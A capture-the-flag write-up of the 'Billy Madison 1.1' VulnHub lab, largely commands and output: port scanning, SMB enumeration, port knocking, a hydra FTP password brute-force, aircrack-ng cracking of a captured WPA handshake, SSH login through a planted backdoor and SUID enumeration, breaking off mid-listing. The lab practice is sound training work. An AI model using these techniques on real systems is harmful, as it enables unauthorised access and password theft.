Billy Madison: 1.1 VulnHub Writeup
- Service discovery
- Port 23 - telnet?
- Port 69 - old school Wordpress
- Port 80 - Uh oh..
- Ports 139 and 445 - do the samba
- Port 2525 - smtp
- Port 69 - "Wordpress"
- Port 80
- Checking out the capture
- Nobody expects the spanish..armarda?
- Eric is a very naughty boy
- Eric's backdoor
- Cleanup duty
- Lost document
Now that we've got access to the target, let's fire off an
root@kali:~# nmap -T4 -A -v -p0-65535 192.168.110.105 Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2016-09-10 23:33 EDT NSE: Loaded 138 scripts for scanning. NSE: Script Pre-scanning. Initiating NSE at 23:33 Completed NSE at 23:33, 0.00s elapsed Initiating NSE at 23:33 Completed NSE at 23:33, 0.00s elapsed Initiating ARP Ping Scan at 23:33 Scanning 192.168.110.105 [1 port] Completed ARP Ping Scan at 23:33, 0.03s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 23:33 Completed Parallel DNS resolution of 1 host. at 23:33, 0.05s elapsed Initiating SYN Stealth Scan at 23:33 Scanning 192.168.110.105 [65536 ports] Discovered open port 22/tcp on 192.168.110.105 Discovered open port 445/tcp on 192.168.110.105 Discovered open port 80/tcp on 192.168.110.105 Discovered open port 139/tcp on 192.168.110.105 Discovered open port 23/tcp on 192.168.110.105 SYN Stealth Scan Timing: About 23.09% done; ETC: 23:35 (0:01:43 remaining) Discovered open port 69/tcp on 192.168.110.105 SYN Stealth Scan Timing: About 58.55% done; ETC: 23:34 (0:00:43 remaining) Discovered open port 2525/tcp on 192.168.110.105 Completed SYN Stealth Scan at 23:34, 88.71s elapsed (65536 total ports) Initiating Service scan at 23:34 Scanning 7 services on 192.168.110.105 Completed Service scan at 23:34, 23.53s elapsed (7 services on 1 host) Initiating OS detection (try #1) against 192.168.110.105 WARNING: RST from 192.168.110.105 port 23 -- is this port really open? WARNING: RST from 192.168.110.105 port 23 -- is this port really open? WARNING: RST from 192.168.110.105 port 23 -- is this port really open? WARNING: RST from 192.168.110.105 port 23 -- is this port really open? WARNING: RST from 192.168.110.105 port 23 -- is this port really open? WARNING: RST from 192.168.110.105 port 23 -- is this port really open? NSE: Script scanning 192.168.110.105. Initiating NSE at 23:34 Completed NSE at 23:35, 40.46s elapsed Initiating NSE at 23:35 Completed NSE at 23:35, 0.01s elapsed Nmap scan report for 192.168.110.105 Host is up (0.00035s latency). Not shown: 65527 filtered ports PORT STATE SERVICE VERSION 22/tcp open tcpwrapped 23/tcp open telnet? 69/tcp open http BaseHTTPServer |_http-generator: WordPress 1.0 | http-methods: |_ Supported Methods: HEAD GET POST OPTIONS |_http-server-header: MadisonHotelsWordpress |_http-title: Welcome | Just another WordPress site 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Oh nooooooo! 137/tcp closed netbios-ns 138/tcp closed netbios-dgm 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 4.3.9-Ubuntu (workgroup: WORKGROUP) 2525/tcp open smtp | smtp-commands: BM, 8BITMIME, AUTH LOGIN, Ok, |_ SubEthaSMTP null on BM Topics: HELP HELO RCPT MAIL DATA AUTH EHLO NOOP RSET VRFY QUIT STARTTLS For more info use "HELP <topic>". End of HELP info 2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service : ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)============== SF-Port23-TCP:V=7.25BETA1%I=7%D=9/10%Time=57D4D0CA%P=x86_64-pc-linux-gnu%r SF:(NULL,E6,"\n\n\*\*\*\*\*\x20HAHAH!\x20You're\x20banned\x20for\x20a\x20w SF:hile,\x20Billy\x20Boy!\x20\x20By\x20the\x20way,\x20I\x20caught\x20you\x SF:20trying\x20to\x20hack\x20my\x20wifi\x20-\x20but\x20the\x20joke's\x20on SF:\x20you!\x20I\x20don't\x20use\x20ROTten\x20passwords\x20like\x20rkfpuzr SF:ahngvat\x20anymore!\x20Madison\x20Hotels\x20is\x20as\x20good\x20as\x20M SF:INE!!!!\x20\*\*\*\*\*\n\n"); ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)============== SF-Port2525-TCP:V=7.25BETA1%I=7%D=9/10%Time=57D4D0D0%P=x86_64-pc-linux-gnu SF:%r(NULL,1F,"220\x20BM\x20ESMTP\x20SubEthaSMTP\x20null\r\n")%r(GetReques SF:t,5A,"220\x20BM\x20ESMTP\x20SubEthaSMTP\x20null\r\n500\x20Error:\x20com SF:mand\x20not\x20implemented\r\n500\x20Error:\x20bad\x20syntax\r\n")%r(Ge SF:nericLines,4D,"220\x20BM\x20ESMTP\x20SubEthaSMTP\x20null\r\n500\x20Erro SF:r:\x20bad\x20syntax\r\n500\x20Error:\x20bad\x20syntax\r\n")%r(Help,13D, SF:"220\x20BM\x20ESMTP\x20SubEthaSMTP\x20null\r\n214-SubEthaSMTP\x20null\x SF:20on\x20BM\r\n214-Topics:\r\n214-\x20\x20\x20\x20\x20HELP\r\n214-\x20\x SF:20\x20\x20\x20HELO\r\n214-\x20\x20\x20\x20\x20RCPT\r\n214-\x20\x20\x20\ SF:x20\x20MAIL\r\n214-\x20\x20\x20\x20\x20DATA\r\n214-\x20\x20\x20\x20\x20 SF:AUTH\r\n214-\x20\x20\x20\x20\x20EHLO\r\n214-\x20\x20\x20\x20\x20NOOP\r\ SF:n214-\x20\x20\x20\x20\x20RSET\r\n214-\x20\x20\x20\x20\x20VRFY\r\n214-\x SF:20\x20\x20\x20\x20QUIT\r\n214-\x20\x20\x20\x20\x20STARTTLS\r\n214-For\x SF:20more\x20info\x20use\x20\"HELP\x20<topic>\"\.\r\n214\x20End\x20of\x20H SF:ELP\x20info\r\n"); MAC Address: 08:00:27:DC:FA:D8 (Oracle VirtualBox virtual NIC) Device type: general purpose Running: OpenBSD 4.X OS CPE: cpe:/o:openbsd:openbsd:4.4 OS details: OpenBSD 4.4 Network Distance: 1 hop Host script results: | smb-os-discovery: | OS: Windows 6.1 (Samba 4.3.9-Ubuntu) | Computer name: bm | NetBIOS computer name: BM | Domain name: | FQDN: bm |_ System time: 2016-09-10T22:35:01-05:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) |_smbv2-enabled: Server supports SMBv2 protocol TRACEROUTE HOP RTT ADDRESS 1 0.35 ms 192.168.110.105 NSE: Script Post-scanning. Initiating NSE at 23:35 Completed NSE at 23:35, 0.00s elapsed Initiating NSE at 23:35 Completed NSE at 23:35, 0.00s elapsed Read data files from: /usr/bin/../share/nmap OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 155.31 seconds Raw packets sent: 131164 (5.774MB) | Rcvd: 146 (15.868KB)
Well, there's no lack of attack surface here. Let's start with what we know.
Firstly I tried connecting via
ssh - no luck there. After a couple of attempts (and a check with
ncat - no data received, and closes connection after two newlines sent) I check out port
23 - supposedly
Port 23 - telnet?
root@kali:~# ncat -v 192.168.110.105 23 Ncat: Version 7.25BETA1 ( https://nmap.org/ncat ) Ncat: Connected to 192.168.110.105:23. ***** HAHAH! You're banned for a while, Billy Boy! By the way, I caught you trying to hack my wifi - but the joke's on you! I don't use ROTten passwords like rkfpuzrahngvat anymore! Madison Hotels is as good as MINE!!!! *****
root@kali:~# ncat -v 192.168.110.105 23 Ncat: Version 7.25BETA1 ( https://nmap.org/ncat ) Ncat: Connection refused.
Yep, we've been banned from connecting to port
23 now. In the original message, we're given the hint that
ROT passwords were used in the past, and then are given an example of
After putting the phrase in to a Caesar Cipher tool, we find the top match with a rotation of
13, equal to
EXSCHMENUATING. This is another reference to
Billy Madison, as shown in this short video. I add it to my wordlist for later.
Port 69 - old school Wordpress
nmap is reporting port
69 as hosting a
http server, powered by none other than
Wordpress 1.0. I have to see this.
Look at it - it's beautiful.
I'm not even sure if
wpscan will run against such an old verison, but let's try.
root@kali:~# wpscan --url http://192.168.110.105:69/ _______________________________________________________________ __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_| WordPress Security Scanner by the WPScan Team Version 2.9.1 Sponsored by Sucuri - https://sucuri.net @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_ _______________________________________________________________ The plugins directory 'wp-content/plugins' does not exist. You can specify one per command line option (don't forget to include the wp-content directory if needed) [?] Continue? [Y]es [N]o, default: [N] Y [+] URL: http://192.168.110.105:69/ [+] Started: Sat Sep 10 23:56:29 2016 [!] The WordPress 'http://192.168.110.105:69/readme.html' file exists exposing a version number [+] Interesting header: SERVER: MadisonHotelsWordpress [+] XML-RPC Interface available under: http://192.168.110.105:69/xmlrpc.php [+] WordPress version 1.0 identified from meta generator (Released on 2004-01-03) [+] WordPress theme in use: twentyeleven [+] Name: twentyeleven | Latest version: 2.5 | Location: http://192.168.110.105:69/wp-content/themes/twentyeleven/ | Readme: http://192.168.110.105:69/wp-content/themes/twentyeleven/readme.txt | Changelog: http://192.168.110.105:69/wp-content/themes/twentyeleven/changelog.txt | Style URL: http://192.168.110.105:69/wp-content/themes/twentyeleven/style.css | Referenced style.css: http://192.168.110.105:69/static/wp-content/themes/twentyeleven/style.css [+] Enumerating plugins from passive detection ... [+] No plugins found [+] Finished: Sat Sep 10 23:56:29 2016 [+] Requests Done: 59 [+] Memory used: 15.312 MB [+] Elapsed time: 00:00:00
Yeah, didn't think so. It did highlight an interesting server header value though -
MadisonHotelsWordpress. Enumerating the users (by visiting
/?author=2, etc), we find there's only a single user named
After a little time spent attempting to bruteforce or guess the password for the
admin user, I cut my losses and move on to port 80.
Port 80 - Uh oh..
Upon visiting port
80, we're met with a taunting message.
The message (excluding images) in full reads as following.
UH OH! Silly Billy!!! If you're reading this, you clicked on the link I sent you. OH NOES! Your computer's all locked up, and now you can't get access to your final 12th grade assignment you've been working so hard on! You need that to graduate, Billy Boy!! Now all I have to do is sit and wait for a while and... THEN MADISON HOTELS IS AS GOOD AS MINE! I bet this is you right now: Think you can get your computer unlocked and recover your final paper before time runs out and you FAAAAIIIILLLLL????? Good luck, schmuck.
Nothing hidden in the page, or the headers. I grab the images and check them, just to be sure.. nothing.
dirsearch, and get a few hits.
root@kali:~/dirsearch# python3 dirsearch.py -u http://192.168.110.105 -e php _|. _ _ _ _ _ _|_ v0.3.6 (_||| _) (/_(_|| (_| ) Extensions: php | Threads: 10 | Wordlist size: 5147 Error Log: /root/dirsearch/logs/errors-16-09-11_00-16-01.log Target: http://192.168.110.105 [00:16:01] Starting: [00:16:01] 403 - 294B - /.hta [00:16:01] 403 - 305B - /.htaccess-local [00:16:01] 403 - 301B - /.ht_wsr.txt [00:16:01] 403 - 303B - /.htaccess-dev [00:16:01] 403 - 303B - /.htaccess.BAK [00:16:01] 403 - 305B - /.htaccess-marco [00:16:01] 403 - 303B - /.htaccess.old [00:16:01] 403 - 303B - /.htaccess.txt [00:16:01] 403 - 306B - /.htaccess.sample [00:16:01] 403 - 304B - /.htaccess.save [00:16:01] 403 - 304B - /.htaccess.bak1 [00:16:01] 403 - 304B - /.htaccess.orig [00:16:01] 403 - 302B - /.htaccessBAK [00:16:01] 403 - 304B - /.htaccess_orig [00:16:01] 403 - 302B - /.htaccess_sc [00:16:01] 403 - 305B - /.htaccess_extra [00:16:01] 403 - 298B - /.htgroup [00:16:01] 403 - 300B - /.htaccess~ [00:16:01] 403 - 303B - /.htaccessOLD2 [00:16:01] 403 - 303B - /.htpasswd-old [00:16:01] 403 - 302B - /.htaccessOLD [00:16:01] 403 - 300B - /.htpasswds [00:16:01] 403 - 304B - /.htpasswd_test [00:16:01] 403 - 298B - /.htusers [00:16:10] 200 - 937B - /index.php [00:16:10] 200 - 937B - /index.php/login/ [00:16:11] 301 - 319B - /manual -> http://192.168.110.105/manual/ [00:16:11] 200 - 626B - /manual/index.html [00:16:13] 403 - 304B - /server-status/ [00:16:13] 403 - 303B - /server-status Task Completed
Nothing of real use here either unfortunately.
Next on our list is
samba, running on ports
Ports 139 and 445 - do the samba
Firstly, we check to see if there are any shares available on the target.
root@kali:~# smbclient -L 192.168.110.105 WARNING: The "syslog" option is deprecated Enter root's password: Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.9-Ubuntu] Sharename Type Comment --------- ---- ------- EricsSecretStuff Disk IPC$ IPC IPC Service (BM) Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.9-Ubuntu] Server Comment --------- ------- BM BM Workgroup Master --------- ------- WORKGROUP BM
Great - let's see if we can connect.
root@kali:~# smbclient //192.168.110.105/EricsSecretStuff WARNING: The "syslog" option is deprecated Enter root's password: Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.9-Ubuntu] smb: \> ls . D 0 Sat Sep 10 23:27:10 2016 .. D 0 Sat Aug 20 14:56:45 2016 ._.DS_Store AH 4096 Wed Aug 17 10:32:07 2016 ebd.txt N 35 Sat Sep 10 23:27:10 2016 .DS_Store AH 6148 Wed Aug 17 10:32:12 2016 30291996 blocks of size 1024. 25800892 blocks available smb: \>
Ok, next let's grab everything we can. I also check to see if we have write access - nope.
smb: \> get ebd.txt getting file \ebd.txt of size 35 as ebd.txt (8.5 KiloBytes/sec) (average 8.5 KiloBytes/sec) smb: \> get .DS_Store getting file \.DS_Store of size 6148 as .DS_Store (1500.9 KiloBytes/sec) (average 754.8 KiloBytes/sec) smb: \> get ._.DS_Store getting file \._.DS_Store of size 4096 as ._.DS_Store (1000.0 KiloBytes/sec) (average 836.5 KiloBytes/sec) smb: \> put test.txt NT_STATUS_ACCESS_DENIED opening remote file \test.txt
The content of the file
ebd.txt tells us that there may be some sort of backdoor on the system, but doesn't tell us much else.
root@kali:~# cat ebd.txt Erics backdoor is currently CLOSED
Last stop -
smtp on port
Port 2525 - smtp
Not much to talk about here. The server appears to run a Java implementation of
SubEthaSMTP. I couldn't get the server to respond, and cannot find any mention of vulnerabilities.
Time to loop back round.
Port 69 - "Wordpress"
After looking at port
69 again, I start to think that this isn't actually Wordpress, but a static site mocked up to look and act like Wordpress (a honeypot). I spend a bit more time attempting to get some more legitimate responses, as well as running my wordlist against it, before deciding this can go on back burner. It just feels too much like a honeypot.
I run my very limited wordlist against port 80, and come out with a new hit -
So, we've got a bit of a log of what the attacker has been doing to ruin
Billy Madison's life.
"Ruin Billy Madison's Life" - Eric's notes 08/01/16 Looks like Principal Max is too much of a goodie two-shoes to help me ruin Billy Boy's life. Will ponder other victims. 08/02/16 Ah! Genius thought! Billy's girlfriend Veronica uses his machine too. I might have to cook up a phish and see if I can't get her to take the bait. 08/03/16 OMg LOL LOL LOL!!! What a twit - I can't believe she fell for it!! I .captured the whole thing in this folder for later lulz. I put "veronica" somewhere in the file name because I bet you a million dollars she uses her name as part of her passwords - if that's true, she rocks! Anyway, malware installation successful. I'm now in complete control of Bill's machine!
The last entry suggests that there's a capture file of some sort in the directory, with the word
veronica in the filename. As I've had a good deal of success with the
rockyou wordlist on bruteforcing recently, I decide to grep it for all words containing the name
veronica. I then run this through
dirbuster with the extensions of
After a while, we get a hit for a single file -
This is a
pcap file, so I use
Wireshark to open it up and investigate.
Checking out the capture
Within the capture are a number of emails that have been sent via port
2525 on the target. The emails read as follows.
EHLO kali MAIL FROM:<email@example.com> RCPT TO:<firstname.lastname@example.org> DATA Date: Sat, 20 Aug 2016 21:56:50 -0500 To: email@example.com From: firstname.lastname@example.org Subject: VIRUS ALERT! X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/ Hey Veronica, Eric Gordon here. I know you use Billy's machine more than he does, so I wanted to let you know that the company is rolling out a new antivirus program for all work-from-home users. Just <a href="http://areallyreallybad.malware.edu.org.ru/f3fs0azjf.php">click here</a> to install it, k? Thanks. -Eric . QUIT EHLO kali MAIL FROM:<email@example.com> RCPT TO:<firstname.lastname@example.org> DATA Date: Sat, 20 Aug 2016 21:57:00 -0500 To: email@example.com From: firstname.lastname@example.org Subject: test Sat, 20 Aug 2016 21:57:00 -0500 X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/ RE: VIRUS ALERT! Eric, Thanks for your message. I tried to download that file but my antivirus blocked it. Could you just upload it directly to us via FTP? We keep FTP turned off unless someone connects with the "Spanish Armada" combo. https://www.youtube.com/watch?v=z5YU7JwVy7s -VV . QUIT EHLO kali MAIL FROM:<email@example.com> RCPT TO:<firstname.lastname@example.org> DATA Date: Sat, 20 Aug 2016 21:57:11 -0500 To: email@example.com From: firstname.lastname@example.org Subject: test Sat, 20 Aug 2016 21:57:11 -0500 X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/ RE: VIRUS ALERT! Veronica, Thanks that will be perfect. Please set me up an account with username of "eric" and password "ericdoesntdrinkhisownpee." -Eric . QUIT EHLO kali MAIL FROM:<email@example.com> RCPT TO:<firstname.lastname@example.org> DATA Date: Sat, 20 Aug 2016 21:57:21 -0500 To: email@example.com From: firstname.lastname@example.org Subject: test Sat, 20 Aug 2016 21:57:21 -0500 X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/ RE: VIRUS ALERT! Eric, Done. -V . QUIT EHLO kali MAIL FROM:<email@example.com> RCPT TO:<firstname.lastname@example.org> DATA Date: Sat, 20 Aug 2016 21:57:31 -0500 To: email@example.com From: firstname.lastname@example.org Subject: test Sat, 20 Aug 2016 21:57:31 -0500 X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/ RE: VIRUS ALERT! Veronica, Great, the file is uploaded to the FTP server, please go to a terminal and run the file with your account - the install will be automatic and you won't get any pop-ups or anything like that. Thanks! -Eric . QUIT EHLO kali MAIL FROM:<email@example.com> RCPT TO:<firstname.lastname@example.org> DATA Date: Sat, 20 Aug 2016 21:57:41 -0500 To: email@example.com From: firstname.lastname@example.org Subject: test Sat, 20 Aug 2016 21:57:41 -0500 X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/ RE: VIRUS ALERT! Eric, I clicked the link and now this computer is acting really weird. The antivirus program is popping up alerts, my mouse started to move on its own, my background changed color and other weird stuff. I'm going to send this email to you and then shut the computer down. I have some important files I'm worried about, and Billy's working on his big 12th grade final. I don't want anything to happen to that! -V . QUIT
Nobody expects the spanish..armarda?
So we've apparently got a login for an FTP server, but the FTP server will only run when someone sends the
"Spanish Armada" combo. I look through the script for
Billy Madison, and find the following exerpt.
Spanish Armada. 1466? '67? 1469? 1514? 1981? 1986?
This sounds like a port knocking sequence to me. I try knocking with the sequence of
for x in 1466 67 1469 1514 1981 1986; do nmap -Pn --host_timeout 201 --max-retries 0 -p $x 192.168.110.105; done
Then I try to connect on port
root@kali:~# ftp 192.168.110.105 Connected to 192.168.110.105. 220 Welcome to ColoradoFTP - the open source FTP server (www.coldcore.com) Name (192.168.110.105:root): eric 331 User name okay, need password. Password: 230 User logged in, proceed. Remote system type is UNIX. ftp>
Eric is a very naughty boy
Let's check out what's available to us.
ftp> ls 200 PORT command successful. 150 Opening A mode data connection for /. -rwxrwxrwx 1 ftp 9132 Aug 20 12:49 40054 -rwxrwxrwx 1 ftp 868 Sep 01 10:42 .notes -rwxrwxrwx 1 ftp 6326 Aug 20 12:49 40049 -rwxrwxrwx 1 ftp 5367 Aug 20 12:49 39772 -rwxrwxrwx 1 ftp 5208 Aug 20 12:49 39773 -rwxrwxrwx 1 ftp 1287 Aug 20 12:49 9129 226 Transfer completed.
I download all of these files and start digging.
First of all I check out the content of the
root@kali:~# cat .notes Ugh, this is frustrating. I managed to make a system account for myself. I also managed to hide Billy's paper where he'll never find it. However, now I can't find it either :-(. To make matters worse, my privesc exploits aren't working. One sort of worked, but I think I have it installed all backwards. If I'm going to maintain total control of Billy's miserable life (or what's left of it) I need to root the box and find that paper! Fortunately, my SSH backdoor into the system IS working. All I need to do is send an email that includes the text: "My kid will be a ________ _________" Hint: https://www.youtube.com/watch?v=6u7RsW5SAgs The new secret port will be open and then I can login from there with my wifi password, which I'm sure Billy or Veronica know. I didn't see it in Billy's FTP folders, but didn't have time to check Veronica's. -EG
Before I move on, I note that the
ftp server allows anonymous login. I login, and find Billys final project document.
root@kali:~# ftp 192.168.110.105 Connected to 192.168.110.105. 220 Welcome to ColoradoFTP - the open source FTP server (www.coldcore.com) Name (192.168.110.105:root): anonymous 331 Guest login okay, send your complete e-mail address as password. Password: 230 User logged in, proceed. Remote system type is UNIX. ftp> ls 200 PORT command successful. 150 Opening A mode data connection for /. -rwxrwxrwx 1 ftp 141 Aug 15 09:19 Billys-12th-grade-final-project.doc 226 Transfer completed. ftp> get Billys-12th-grade-final-project.doc local: Billys-12th-grade-final-project.doc remote: Billys-12th-grade-final-project.doc 200 PORT command successful. 150 Opening A mode data connection for Billys-12th-grade-final-project.doc. 226 Transfer completed for "Billys-12th-grade-final-project.doc". 145 bytes received in 0.25 secs (0.5690 kB/s) ftp> quit 221 Logged out, closing control connection. root@kali:~# cat Billys-12th-grade-final-project.doc HHAHAAHAHAH I CAN'T BELIEVE YOU ACTUALLY THOUGHT THIS WAS IT!!!! WHAT A LOSER! Why don't you go pass out by the pool for another hour! -EG
Moving on..So apparently there's a backdoor on the target. We can enable the backdoor by sending an email with a certain phrase. After watching the linked YouTube video I reckon this phrase is
My kid will be a soccer player. I send an email with the phrase using
root@kali:~# swaks --to email@example.com --from firstname.lastname@example.org --server 192.168.110.105:2525 --body "My kid will be a soccer player" --header "Subject: My kid will be a soccer player" === Trying 192.168.110.105:2525... === Connected to 192.168.110.105. <- 220 BM ESMTP SubEthaSMTP null -> EHLO kali <- 250-BM <- 250-8BITMIME <- 250-AUTH LOGIN <- 250 Ok -> MAIL FROM:<email@example.com> <- 250 Ok -> RCPT TO:<firstname.lastname@example.org> <- 250 Ok -> DATA <- 354 End data with <CR><LF>.<CR><LF> -> Date: Thu, 15 Sep 2016 07:57:56 -0400 -> To: email@example.com -> From: firstname.lastname@example.org -> Subject: My kid will be a soccer player -> X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/ -> -> My kid will be a soccer player -> -> . <- 250 Ok -> QUIT <- 221 Bye === Connection closed with remote host.
I then perform another
nmap scan. Sure enough, we find a new port open.
1974/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 f2:02:a4:3b:8f:84:a2:fd:28:53:e5:2d:a2:63:90:48 (RSA) |_ 256 31:60:85:b5:93:da:92:9e:90:a2:d0:a7:c4:51:42:8e (ECDSA)
Next we need to get hold of the wifi password. There's a hint that points us towards
ftp folder. We don't have a login for her.. damn. I run
hydra against the
veronica user using our wordlist generated earlier from the
root@kali:~# hydra -t 10 -l veronica -P billy-rockyou.list 192.168.110.105 ftp Hydra v8.2 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (http://www.thc.org/thc-hydra) starting at 2016-09-15 08:19:26 [DATA] max 10 tasks per 1 server, overall 64 tasks, 773 login tries (l:1/p:773), ~1 try per task [DATA] attacking service ftp on port 21 [ftp] host: 192.168.110.105 login: veronica password: email@example.com 1 of 1 target successfully completed, 1 valid password found Hydra (http://www.thc.org/thc-hydra) finished at 2016-09-15 08:19:54
Let's login and grab what we can.
root@kali:~# ftp 192.168.110.105 Connected to 192.168.110.105. 220 Welcome to ColoradoFTP - the open source FTP server (www.coldcore.com) Name (192.168.110.105:root): veronica 331 User name okay, need password. Password: 230 User logged in, proceed. Remote system type is UNIX. ftp> binary 200 Type set to I ftp> ls 200 PORT command successful. 150 Opening A mode data connection for /. -rwxrwxrwx 1 ftp 719128 Aug 17 12:16 eg-01.cap -rwxrwxrwx 1 ftp 595 Aug 20 12:55 email-from-billy.eml 226 Transfer completed. ftp> get eg-01.cap local: eg-01.cap remote: eg-01.cap 200 PORT command successful. 150 Opening I mode data connection for eg-01.cap. 226 Transfer completed for "eg-01.cap". 719128 bytes received in 0.69 secs (1012.8116 kB/s) ftp> get email-from-billy.eml local: email-from-billy.eml remote: email-from-billy.eml 200 PORT command successful. 150 Opening I mode data connection for email-from-billy.eml. 226 Transfer completed for "email-from-billy.eml". 595 bytes received in 0.53 secs (1.0980 kB/s) ftp> quit 221 Logged out, closing control connection.
Let's have a dig through what we've got.
root@kali:~# cat email-from-billy.eml Sat, 20 Aug 2016 12:55:45 -0500 (CDT) Date: Sat, 20 Aug 2016 12:55:40 -0500 To: firstname.lastname@example.org From: email@example.com Subject: test Sat, 20 Aug 2016 12:55:40 -0500 X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/ Eric's wifi Hey VV, It's your boy Billy here. Sorry to leave in the middle of the night but I wanted to crack Eric's wireless and then mess with him. I wasn't completely successful yet, but at least I got a start. I didn't walk away without doing my signature move, though. I left a flaming bag of dog poo on his doorstep. :-) Kisses, Billy
Damn, so no password yet, but we do have another
.cap file. After opening the file in
wireshark, it looks like we have a capture of some wifi traffic, so I immediately pass it on to
aircrack-ng with the
rockyou wordlist to chomp away at.
root@kali:~# aircrack-ng eg-01.cap -w dirsearchtmp/rockyou.txt Opening eg-01.cap Read 13003 packets. # BSSID ESSID Encryption 1 02:13:37:A5:52:2E EricGordon WPA (1 handshake) Choosing first network as target. Opening eg-01.cap Reading packets, please wait... Aircrack-ng 1.2 rc4 [00:10:41] 1699616/9822769 keys tested (3266.99 k/s) Time left: 41 minutes, 27 seconds 17.30% KEY FOUND! [ triscuit* ] Master Key : 9E 8B 4F E6 CC 5E E2 4C 46 84 D2 AF 59 4B 21 6D B5 3B 52 84 04 9D D8 D8 83 67 AF 43 DC 60 CE 92 Transient Key : 7A FA 82 59 5A 9A 23 6E 8C FB 1D 4B 4D 47 BE 13 D7 AC AC 4C 81 0F B5 A2 EE 2D 9F CC 8F 05 D2 82 BF F4 4E AE 4E C9 ED EA 31 37 1E E7 29 10 13 92 BB 87 8A AE 70 95 F8 62 20 B5 2B 53 8D 0C 5C DC EAPOL HMAC : 86 63 53 4B 77 52 82 0C 73 4A FA CA 19 79 05 33
And there we go - the network name is
EricGordon, and the password was
triscuit*. I attempt to login to
ssh on port
1974 with the username
EricGordon, but have no success. After a few attempts, I try the username
eric, and we get in.
root@kali:~# ssh -p 1974 firstname.lastname@example.org email@example.com's password: Welcome to Ubuntu 16.04.1 LTS (GNU/Linux 4.4.0-36-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage 37 packages can be updated. 0 updates are security updates. Last login: Sat Aug 20 22:28:28 2016 from 192.168.3.105 eric@BM:~$
Let's see what we have available to us in
eric's home directory.
eric@BM:~$ ls -lah total 532K drwxr-xr-x 3 eric eric 4.0K Aug 23 00:18 . drwxr-xr-x 6 root root 4.0K Aug 20 13:56 .. -rw-r--r-- 1 eric eric 220 Aug 20 13:56 .bash_logout -rw-r--r-- 1 eric eric 3.7K Aug 20 13:56 .bashrc drwx------ 2 eric eric 4.0K Aug 20 14:07 .cache -rw-r--r-- 1 root root 441K Aug 7 22:31 eric-tongue-animated.gif -rw-r--r-- 1 root root 60K Aug 7 22:29 eric-unimpressed.jpg -rw-r--r-- 1 eric eric 655 Aug 20 13:56 .profile -rw-r--r-- 1 root root 115 Aug 20 20:41 why-1974.txt eric@BM:~$ cat why-1974.txt Why 1974? Because: http://www.metacafe.com/watch/an-VB9KuJtnh4bn/billy_madison_1995_billy_hangs_out_with_friends/
I check out both images, but nothing of interest comes out of them.
Time to try and elevate.
After some digging around, and based off of previous findings, it looks like
eric originally used one of a number of exploits to elevate to
root. None of these exploits appear to work anymore, however an interesting
suid file was discovered.
eric@BM:~$ find / -user root -perm -4000 -ls 2>/dev/null 1454477 368 -r-sr-s--- 1 root eric 372922 Aug 20 22:35 /usr/local/share/sgml/donpcgd 1048829 136 -rwsr-xr-x 1 root root 136808 May 4 12:25 /usr/bin/sudo 1058216 24 -rwsr-xr-x 1 root root 23376 Jan 17 2016 /usr/bin/pkexec 1048745 56 -rwsr-xr-x 1 root root 54256 Mar 29 04:25 /usr/bin/passwd 1057557 36 -rwsr-xr-x 1 root root 32944 Mar 29 04:25 /usr/bin/newgidmap 1048609 40 -rwsr-xr-x 1 root root 40432 Mar 29 04:25 /usr/bin/chsh 1048670 76 -rwsr-xr-x 1 root root 75304 Mar 29 04:25 /usr/bin/gpasswd 1057558 36 -rwsr-xr-x 1 root root 32944 Mar 29 04:25 /usr/bin/newuidmap 1048734 40 -rwsr-xr-x 1 root root 39904 Mar 29 04:25 /usr/bin/newgrp 1048607 52 -rwsr-xr-x 1 root root 49584 Mar 29 04:25 /usr/bin/chfn 1058246 24 -rwsr-xr-x 1 root root 23288 Apr 29 11:02 /usr/bin/ubuntu-core-launcher 1048930 12 -rwsr-xr-x 1 root root 10240 Feb 25 2014 /usr/lib/eject/dmcrypt-get-device 1057498 40 -rwsr-xr-x 1 root root 38984 Jun 30 02:28 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic 1318420 16 -rwsr-xr-x 1 root root 14864 Jan 17 2016 /usr/lib/policykit-1/polkit-agent-helper-1 1066069 420 -rwsr-xr-x 1 root root 428240 Aug 11 11:25 /usr/lib/openssh/ssh-keysign 1056767 44 -rwsr-xr-- 1 root messagebus 42992 Apr 1 11:41 /usr/lib/dbus-1.0/dbus-daemon-launch-helper 1179709 40 -rwsr-xr-x 1 root root 40152 May 26 18:31 /bin/mount 1179740 40 -rwsr-xr-x 1 root root 40128 Mar 29 04:25 